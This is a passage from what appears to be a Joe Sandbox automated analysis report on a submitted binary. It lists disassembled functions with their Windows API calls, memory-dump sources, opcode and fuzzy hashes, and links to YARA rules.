Opcode Fuzzy Hash: 3b37f9c94a6c3b8a3b575a949ad866e9b938522d07dde383a0ef3ca35ff73628
Instruction Fuzzy Hash: 06F08231008790AACB3257B48904BCB7B906F1A331F048A4AF1FD52196C2755198AB23

Function 00CC0E08 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON

Download Yara Rule

APIs

SetThreadExecutionState.KERNEL32(00000001), ref: 00CC0E3D

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: ExecutionStateThread
String ID:
API String ID: 2211380416-0
Opcode ID: 383ec6bccae640e989107727725707f9d7eb1893de6df45f6fbf26292700e56a
Instruction ID: 37e944fc314ff605fab29f43e648851c1d5d780ac17d1cfff036f017039fe714
Opcode Fuzzy Hash: 383ec6bccae640e989107727725707f9d7eb1893de6df45f6fbf26292700e56a
Instruction Fuzzy Hash: CAD02B1060109497DF113729E869FFF29068FC7310F0D002EF9855B283CE580C82B262

Function 00CCA626 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON

Download Yara Rule

APIs

GdipAlloc.GDIPLUS(00000010), ref: 00CCA62C

Part of subcall function 00CCA3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00CCA3DA

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: Gdip$AllocBitmapCreateFromStream
String ID:
API String ID: 1915507550-0
Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
Instruction ID: 25e31739267cab5ce5c55da19d9299c4df7920c4f04eb95344ed99a12d7d112a
Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
Instruction Fuzzy Hash: 2CD0C77121020D7ADF41AB61DC16F7E7595EB01344F048129F842D5151EAB1DD10A556

Function 00CCE5BB Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE

Download Yara Rule

APIs

DloadProtectSection.DELAYIMP ref: 00CCE5E3

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: DloadProtectSection
String ID:
API String ID: 2203082970-0
Opcode ID: 1089722c96246ef3d143fd0cc75b989ba33e2c28c375646cafcd63217f063866
Instruction ID: c9eddef9ad92193efe711680a8dcf6ec861afb09de4a2ebc62a35a6bb9e57673
Opcode Fuzzy Hash: 1089722c96246ef3d143fd0cc75b989ba33e2c28c375646cafcd63217f063866
Instruction Fuzzy Hash: 3AD022B80C0380AFC701EBA8E882F893B5AB322704F80000CF304D2290CF7880C1D721

Function 00CCDD6D Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00CC1B3E), ref: 00CCDD92

Part of subcall function 00CCB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CCB579
Part of subcall function 00CCB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CCB58A
Part of subcall function 00CCB568: IsDialogMessageW.USER32(00010410,?), ref: 00CCB59E
Part of subcall function 00CCB568: TranslateMessage.USER32(?), ref: 00CCB5AC
Part of subcall function 00CCB568: DispatchMessageW.USER32(?), ref: 00CCB5B6

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekSendTranslate
String ID:
API String ID: 897784432-0
Opcode ID: 1f16da30b220c33082879c83ed8f9e504ca2db5fd4e7806e28db3b9bae64f62e
Instruction ID: cc8c093bf811328f5cff627726bfb15ba2d3d0be1f0e42137d9ff38438bcb56b
Opcode Fuzzy Hash: 1f16da30b220c33082879c83ed8f9e504ca2db5fd4e7806e28db3b9bae64f62e
Instruction Fuzzy Hash: 61D09E71144300BAD6012B51CD06F1E7AA2AB88B05F004558B284740F1CA72DD71EB12

Function 00CB98BC Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(000000FF,00CB97BE), ref: 00CB98C8

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 61449de7d984a29ce40f8eb4b52acec077a79f165c835af9c32d785c793aa695
Instruction ID: 2d1d91512d03ab08bdd5939f47dc5f17fcacc9078f011e366190eb1edc0e4ae8
Opcode Fuzzy Hash: 61449de7d984a29ce40f8eb4b52acec077a79f165c835af9c32d785c793aa695
Instruction Fuzzy Hash: 33C00234404245968E619B28A8891D97722EE533A6FB496A8D2798E0E1C333CE97EA11

Function 00CCE1D1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00CCE1E3

Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3ab24b4e3a418dccda63f56cb04ad188c8d623ca4e22a84166e635cca5609fff
Instruction ID: d847ff5b4f372056232c74099920c8eed22f1ff78f224227fef6e95967a03ab6
Opcode Fuzzy Hash: 3ab24b4e3a418dccda63f56cb04ad188c8d623ca4e22a84166e635cca5609fff
Instruction Fuzzy Hash: 8AB012D525E240BC3504114BAC42D3B010CC1C3B10330843EFC01C04C1DC80BE912831

Function 00CCE1EC Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00CCE1E3

Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 9c6fd8dcad6dd20fe5c943af5626af29d96231fc6afa2bf3f94d635291c1b2a2
Instruction ID: 178283cc5932df35b44495e7e6dfc86d70238636bdeeba1e82539f7caaf183a7
Opcode Fuzzy Hash: 9c6fd8dcad6dd20fe5c943af5626af29d96231fc6afa2bf3f94d635291c1b2a2
Instruction Fuzzy Hash: D8B012D525E240BC3104514FAC42E3B011CC1C2B10330403EF805C01C1DC807E912931

Function 00CCE1F6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00CCE1E3

Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 5f84316fa8e7bc95541925e1dc9256f34f78ada828bc88c5c8fdc76e136c51b7
Instruction ID: d750b25621af44e8c2d3469c8fa9bf1f0444fbd39f9f8ab13a99e46b8ad95982
Opcode Fuzzy Hash: 5f84316fa8e7bc95541925e1dc9256f34f78ada828bc88c5c8fdc76e136c51b7
Instruction Fuzzy Hash: 07B012D125E240BC3504520BAC02E3B010CC2C3B10330C13EFC09C02C1DC40BE852831

Function 00CCEAE7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00CCEAF9

Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c479ffdec7a4601ed44995e8238de88da2e974598cde170da9abef67ebe0d5dd
Instruction ID: 208345a2186b747f4d33c3136b89ed2747853d08aaeb7211802d22e1649711b0
Opcode Fuzzy Hash: c479ffdec7a4601ed44995e8238de88da2e974598cde170da9abef67ebe0d5dd
Instruction Fuzzy Hash: 75B012CB29B0827C31086206AD42D37010CC0C2B90330803EF400D40C1DC800C422431

Function 00CCE282 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00CCE1E3

Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f9f4da393591b47e89d838a2bc9884c0286210f323a026b2f965c7c5b17cff90
Instruction ID: 3ed86f3adea4ff8d10b7235398cdabad255e6d56bbbc0f99b279f8b5b8974963
Opcode Fuzzy Hash: f9f4da393591b47e89d838a2bc9884c0286210f323a026b2f965c7c5b17cff90
Instruction Fuzzy Hash: A8B012E129E140BC3104510BAD02E3B019CC1C2B10330403EF805C01C1DC407F822831

Function 00CCE2B4 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00CCE1E3

Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 40b308ee605ec3116551393c4160c2fa974ea4bc373060ad8df96f1664b28655
Instruction ID: 7ed7a9564c215a3f47af2e0538d7e90ba32586eebfe110d041deacdd665f3543
Opcode Fuzzy Hash: 40b308ee605ec3116551393c4160c2fa974ea4bc373060ad8df96f1664b28655
Instruction Fuzzy Hash: 84B012D135E140BC3104511BEC03E7B010CC1C2B10330443EF805C01C1DC407E812831

Function 00CCE246 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00CCE1E3

Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 9674dbdbef7ee2a77e14247f90b274760c3b58c8ba48bce03c6f1896c119c34b
Instruction ID: b00881f37b4b402357efc87b8f9922dab3e1c767e696aecfea03d4ac6740eb7b
Opcode Fuzzy Hash: 9674dbdbef7ee2a77e14247f90b274760c3b58c8ba48bce03c6f1896c119c34b
Instruction Fuzzy Hash: 40B012D125F180BC3508510BAC02E3B010DC1C3B20330803EFC05C01C1DC40BE812831

Function 00CCE250 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00CCE1E3

Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3adf0a2a60eca7603e9cbdf971ebebd2bca2fec5e0f60a5fc545574df5efc375
Instruction ID: 51ac569b3b7af83f0d5b321f5dc1e3e68f5aac8200476b2ed8f81d2a15606c34
Opcode Fuzzy Hash: 3adf0a2a60eca7603e9cbdf971ebebd2bca2fec5e0f60a5fc545574df5efc375
Instruction Fuzzy Hash: 71B012E125F280BC3148520BAC02E3B010DC1C2B20330413EFC05C01C1DC407EC52831

Function 00CCE26E Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00CCE1E3

Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 1e3ba585c305d31dd74540d0c1edf44a13cd2d49df003d3872b04a42dd4d9431
Instruction ID: 7a7cb387c082bfc791971ab7c73e410c844105e7dd0000ad6eec53b2f8b2db13
Opcode Fuzzy Hash: 1e3ba585c305d31dd74540d0c1edf44a13cd2d49df003d3872b04a42dd4d9431
Instruction Fuzzy Hash: 72B012D125E140BC3504515BAC02E3B014CC1C3B10330803EFC05C01C1DC40BE812831

Function 00CCE264 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00CCE1E3

Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 26fed456e19695f5613b30a0a294fa482ab79ae79260341acfccb5e014687bfc
Instruction ID: 3347c6957b5cc7e43c985ca2227a2de469e80fba3b3fdbbb15e36e57ad864dfb
Opcode Fuzzy Hash: 26fed456e19695f5613b30a0a294fa482ab79ae79260341acfccb5e014687bfc
Instruction Fuzzy Hash: 38B012D126F180BC3108510BAC02E3B014DC5C2B20330403EF806C01C1DC407E812831

Function 00CCE20A Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00CCE1E3

Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e82122676f1dff0133ff03f4111bfa36e98b8880368c7a3bf01a7e8531501fd4
Instruction ID: 4fcae44251831ae49724fb6257c372045c8cd0c93cdec06abed34c17b33eaed7
Opcode Fuzzy Hash: e82122676f1dff0133ff03f4111bfa36e98b8880368c7a3bf01a7e8531501fd4
Instruction Fuzzy Hash: C3B012D139E240BC3104520BAD02E3B010CC2C3B10330803EF809C02C1DC507F8A2831

Function 00CCE200 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00CCE1E3

Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

